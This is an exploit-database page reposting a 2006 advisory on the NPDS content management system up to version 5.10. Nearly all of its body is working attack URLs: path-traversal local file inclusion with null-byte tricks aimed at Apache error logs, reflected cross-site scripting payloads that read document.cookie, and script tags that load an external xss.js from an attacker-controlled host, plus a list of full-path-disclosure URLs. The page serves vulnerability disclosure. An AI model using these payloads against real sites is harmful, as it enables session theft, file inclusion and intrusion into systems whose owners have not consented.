Advertisement






NPDS <= 5.10 Local Inclusion, XSS, Full path disclosure

CVE Category Price Severity
N/A CWE-346: Origin Validation Error Unknown High
Author Risk Exploitation Type Date
Unknown High Local 2006-06-15
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.05 0.55

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006060081

Below is a copy:

// Script

Web -------- www.npds.org

versions --- NPDS <= 5.10

Solutions -- None official

Note ------- Vendor has been contacted

// Local Inclusion

http://[...]/header.php?Default_Theme=../apache/logs/error.log%00

http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../
../apache/logs/error.log%00

// Cross Site Scripting

http://[...]/header.php?Titlesitename=</title><script>alert(document.coo
kie)</script>

http://[...]/header.php?sitename="><script>alert(document.cookie)</scrip
t>

http://[...]/meta/meta.php?nuke_url="><script>alert(document.cookie)</sc
ript>

http://[...]/viewforum.php?forum=2"><script src=http://[...]/xss.js>

http://[...]/editpost.php?forum=1&post_id=888"><script src=http://[...]/xss.js>

http://[...]/editpost.php?forum=1"><script src=http://[...]/xss.js>

http://[...]/editpost.php?forum=1&topic="><script src=http://[...]/xss.js>

http://[...]/editpost.php?forum=1&arbre="><script src=http://[...]/xss.js>

http://[...]/user.php?op=only_newuser&uname="><script src=http://[...]/xss.js>

http://[...]/user.php?op=only_newuser&email="><script src=http://[...]/xss.js>

// Full Path Disclosure

http://[...]/header.php

http://[...]/modules/contact/contact.php

http://[...]/modules/sform/forum/forum_extender.php

// Credits

by DarkFig -- http://www.acid-root.new.fr/advisories/npds510.txt

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.